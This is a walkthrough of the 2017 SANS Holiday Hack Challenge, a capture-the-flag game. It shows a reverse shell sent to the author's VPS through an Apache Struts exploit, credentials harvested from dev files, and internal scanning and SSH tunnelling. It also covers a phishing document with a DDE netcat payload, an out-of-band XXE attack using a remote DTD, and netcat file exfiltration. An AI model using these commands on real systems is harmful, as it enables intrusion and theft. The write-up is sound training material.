HHC 2017 writeup, by RedTeam611

Transcription

1 HHC 2017 writeup, by RedTeam611 After you complete the terminal challenges in the snowball games you will then move onto the web server challenges. Our first task to is to investigate the Letters to Santa application at What is the topic of The Great Book page available in the web root of the server? What is Alabaster Snowball's password? This website is public internet facing. When visiting this site you notice it might by SQL injectable or have other types of exploits. But taking a quick look at the source shows us a URL leading to the Dev server located at

2 When browsing to the Dev server [ we can see they have a Toy ordering system. According to the hints this site is exploitable to Appache struts CVE The Sans hints link us to a Blog showing how to edit a Apache Struts python exploit. We will use this Python exploit and tweak some stuff/commands

3 Note: We will need to fire up up a VPS with the python script installed on it.vps s are easier to work with as they have public IP addresses and if you are trying to catch a reverse shell they are easier to catch then setting up port forwarding on your router at home, assuming you have access to your router. If we use the syntax for the python script you will see the payload executed [whoami] but does not return any information. How do we know the command [whoami] is being executed on the server? One way to test this would be to make a test file on the webs server folder that we can then browse to in our Firefox and download the test file. I didn t go this route and tested with a reverse shell. We will need 2 windows open for our reverse shell. One to send the python script and one to catch the shell, if successful. I usually use Pentest monkey s cheat sheet for reverse shells We will be using the python command python cve py -u -c "bash -i >& /dev/tcp/ /1337 0>&1" Our VPS is using the IP and we will be using port 1337 ;) The command [bash -i >& /dev/tcp/ /1337 0>&1] sends a Reverse shell to our VPS and as you can see by the screen shot, the command is executed successful and we are now in the system/dev server.

4 Our next step once in the Dev server is to find Alabaster_Snowballs password. We can see by our Elf hints that sometimes developers hard code credentials into their development files. In this cause Alabaster most likely did this. If we Google what folder does developers keep files stored in, we lead to the /opt directory. We will be using a recursive Grep looking for the user name alabaster. [grep -nr 'alabaster*'.] We can now see the string username [alabaster_snowball] was found in a.class file and if we open with file we can see his password. We have found his password of [ stream_unhappy_buy_loss ] 2)Next we will move on to the SMB server. The North Pole engineering team uses a Windows SMB server for sharing documentation and correspondence. Using your access to the Letters to Santa server, identify and enumerate the SMB file-sharing server. What is the file server share name?

5 First thing we need to do is a Nmap scan of the network to get a idea of whats around internally. We will start with [nmap ] This will scan the subnet starting from.1 to.255 alabaster_snowball@l2s:/$ nmap nmap Starting Nmap 7.40 ( ) at :26 UTC Nmap scan report for hhc17-l2s-proxy.c.holidayhack2017.internal ( ) Host is up ( s latency). Not shown: 996 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 443/tcp open https 2222/tcp open EtherNetIP-1 Nmap scan report for hhc17-apache-struts1.c.holidayhack2017.internal ( ) Host is up ( s latency). Not shown: 998 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap scan report for mail.northpolechristmastown.com ( ) Host is up ( s latency). Not shown: 994 closed ports PORT STATE SERVICE 22/tcp open ssh 25/tcp open smtp 80/tcp open http 143/tcp open imap 2525/tcp open ms-v-worlds 3000/tcp open ppp Nmap scan report for edb.northpolechristmastown.com ( ) Host is up ( s latency). Not shown: 996 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 389/tcp filtered ldap 8080/tcp open http-proxy Nmap scan report for hhc17-emi.c.holidayhack2017.internal ( ) Host is up ( s latency). Not shown: 995 closed ports PORT STATE SERVICE 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds

6 3389/tcp open ms-wbt-server Nmap scan report for hhc17-apache-struts2.c.holidayhack2017.internal ( ) Host is up ( s latency). Not shown: 996 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 5678/tcp open rrac 8082/tcp open blackice-alerts Nmap scan report for eaas.northpolechristmastown.com ( ) Host is up (0.0012s latency). Not shown: 998 filtered ports PORT STATE SERVICE 80/tcp open http 3389/tcp open ms-wbt-server Nmap done: 255 IP addresses (7 hosts up) scanned in 8.56 seconds As we can see from Nmap output, the IP has port 445 open indicating it has smb open. But if we try to access this smb server with Alabaster s user name and password we will be unsuccessful/denied. This server is meant to throw you off. If we tweak our Nmap scan, the Elf hint tell s us there is hidden smb server. We must change our Nmap command to find it. Using the command [nmap -PS ] we can see there is another smb server, this definitely shows us it is the right server, its named SMB SEVER! DERP!

7 hhc17-smb-server.c.holidayhack2017.internal ( ) In order to access this server we will have to use some port forwarding. If we ping the Dev server URL at dev.northpolechristmastown.com it will return the Public IP address for the server which is We can login into the Dev server with port forwarding that then sends us to the SMB server using Alabster s password stream_unhappy_buy_loss. [ ssh -L :445: :445 alabaster_snowball@ ] Once connected we will use smbclient command to find the share available. The -L will list of shares of the username Alabaster_Snowball [ smbclient -L U alabaster_snowball ] We can see the Filestor is the sharename we most likely need to investigate. We will login the smb server with password reuse and can then see our next GreatBookPage 3 flag.

8 3) Elf Web Access (EWA) is the preferred mailer for North Pole elves, available internally at What can you learn from The Great Book page found in an on that server? Our next step is to access the Elf server. As we can see from our Nmap scan of IP ports 80 and 3000 are open. They are associated with a webserver. If you ssh forward to port 80 you will get a default Apache Ubuntu page, which tells you, your using the wrong port. We need to forward to port 3000 not 80. Nmap scan report for mail.northpolechristmastown.com ( ) Host is up ( s latency). Not shown: 994 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) 25/tcp open smtp Postfix smtpd 80/tcp open http nginx (Ubuntu) 143/tcp open imap Dovecot imapd 2525/tcp open smtp Postfix smtpd 3000/tcp open http Node.js Express framework Service Info: Host: mail.northpolechristmastown.com; OS: Linux; CPE: cpe:/o:linux:linux_kernel We will tunnel use the follow command to ssh tunnel. It s basically saying to forward us to port 3000 from our localhost port 8080 through our ssh tunnel. ssh -L 8080:mail.northpolechristmastown.com:3000 alabaster_snowball@ As you can see if now have access to the EWA, which is a knock off of Microsoft OWA. After getting the to EWA login there is a challenge to build the cookie to login. I had someone help me with this and or give me the answer as I was not smart enough to figure it out. So basically our cookie needs to look like this. The cookie to build is located at localhost:8080/cookie.txt

9 We download the cookie manager plug-in for Firefox and add the following cookie to the content area. AAAAAAAAAAAAAAAAA"} After we do this we save it and F5 refresh to login as Alabaster. Like any other complex SCADA systems, the North Pole uses Elf-Machine Interfaces (EMI) to monitor and control critical infrastructure assets. These systems serve many uses, including access and web browsing. Gain access to the EMI server through the use of a phishing attack with your access to the EWA server. Retrieve The Great Book page from C:\GreatBookPage7.pdf. What does The Great Book page describe? When going through Alabaster s we can see that he wants a gingerbread cookie recipe in a docx file. If we send him this file to his emal he will open it and we will phish him with a DDE exploit.

10 In the screen shot above Alabaster hints that he has Netcat installed on his system. We will use this for the DDE attack. As I am typing this report on Kali I will not have the screenshot for MS word. The sytnax for the DDE we will use will be DDEAUTO c:\\windows\\system32\\cmd.exe "/k nc.exe e cmd.exe" Since Alabaster has netcat on his system this command will execute netcat to connect to our VPS and return the command prompt.

11

12 Once in the EMI server we can grab our flag for the GreatbookPage 7 The GreatBookage 7 is the last book to get. Tracking back to GreatBookPage 6 now we go to our last challenge we needed to complete. The North Pole engineering team has introduced an Elf as a Service (EaaS) platform to optimize resource allocation for mission-critical Christmas engineering projects at Visit the system and retrieve instructions for accessing The Great Book page from C:\greatbook.txt. Then retrieve The Great Book PDF file by following those directions. What is the title of The Great Book page? We will get to the EaaS service with port forwarding once again with ssh -L 8080:eaas.northpolechristmastown.com:80 alabaster_snowball@ pw=stream_unhappy_buy_loss This is located internally at eaas.northpolechristmastown.com or the IP.

13

14 The EAAS site uses XML data to manage requests from other teams. There is a sample request layout available that you can download. Teams just customize the XML and submit. XML processing can be complex. Sans has a blog about how to to exploit XML attacks. On this site we will edit some of the sample XML code they use and use it on the EasS server. The challenge states to get the GreatBookPage 6 information from the c:\greatbook.txt path. We will use this path in our XML exploit.

15 1. We upload our edited XML payload which points the system to load a DTD file from our remote web server/vps. 2. The XML parser reaches out to the designated VPS/Web Server to retrieve DTD contents. 3. XML parser loads the contents of the DTD into the pre-processing of the original XML payload and returns us the results of c:\greatbook.txt

16 As we can see from the screenshot, to the right the EaaS server downloads the evil.dtd from our VPS webserver on port 8080 and on the left it returns the results from the c:\greatbook.txt file on port We then get the path to the GreatBookPage6 We have successfully captured all the GreatBook flags for the HHC! Tips and tricks 1)Use certutil to get Sha1hash from file names in Windows CMD Example: Example: [ C:\>certutil -hashfile GreatBookPage7.pdf SHA1 ] 2)Use Sha1sum to get Sha1 hash of GreatBook to upload to achievements Example: [ Sha1sum GreatBook.pdf ] 3)Use netcat to transfer files with windows Example: [ nc.exe -w < GreatBookPage7.pdf ] --Send Example: [ nc -l -p 1338 > GreatBookPage7.pdf ] Receive